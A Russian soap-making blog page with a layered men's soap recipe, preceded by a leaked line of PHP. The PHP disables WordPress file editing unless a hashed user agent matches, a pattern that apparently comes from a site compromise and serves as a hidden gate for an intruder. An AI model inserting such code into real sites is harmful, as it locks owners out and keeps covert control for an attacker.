if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыло для мужчин “Морской бриз” | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыло для мужчин “Морской бриз”

Наши дорогие мужчины заслуживают самых нежных отношений. И, хотя сильный пол никогда в этом не признается, получать в подарок или просто сюрпризом мужскую косметику очень и очень приятно

Наши доро­гие муж­чи­ны заслу­жи­ва­ют самых неж­ных отно­ше­ний. И, хотя силь­ный пол нико­гда в этом не при­зна­ет­ся, полу­чать в пода­рок или про­сто сюр­при­зом муж­скую кос­ме­ти­ку очень и очень приятно.

Итак, для мыла «Мор­ской бриз» нам понадобятся:

  1. Дет­ское мыло (или банное)
  2. Олив­ко­вое масло;
  3. Гли­це­рин;
  4. Отвар ромаш­ки
  5. Пище­вой кра­си­тель зеле­но­го и голу­бо­го цвета
  6. Эфир­ное мас­ло «Оке­ан»

После того, согре­е­те до нуж­но тем­пе­ра­ту­ры поре­зан­ное кусоч­ка­ми мыло, добавь­те в него в рав­ных частях мас­ло, ромаш­ко­вый отвар и эфир­ное мас­ло. Все хоро­шо пере­ме­шай­те и добавь­те гли­це­рин и эфир­ное мас­ло. Для ори­ги­наль­но­сти мож­но мыль­ную мас­су (рас­топ­лен­ное мыло) раз­де­лить на три части и все их выкра­сить в раз­ные цве­та пище­вы­ми кра­си­те­ля­ми. Затем, вылить в фор­му полу­чен­ную раз­но­цвет­ную мас­су сло­я­ми и оста­вить остужать.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Rio Rita

Обожаю мыловарение и всегда рада поделиться своими знаниями с мыловарами :) Читайте все мои записи!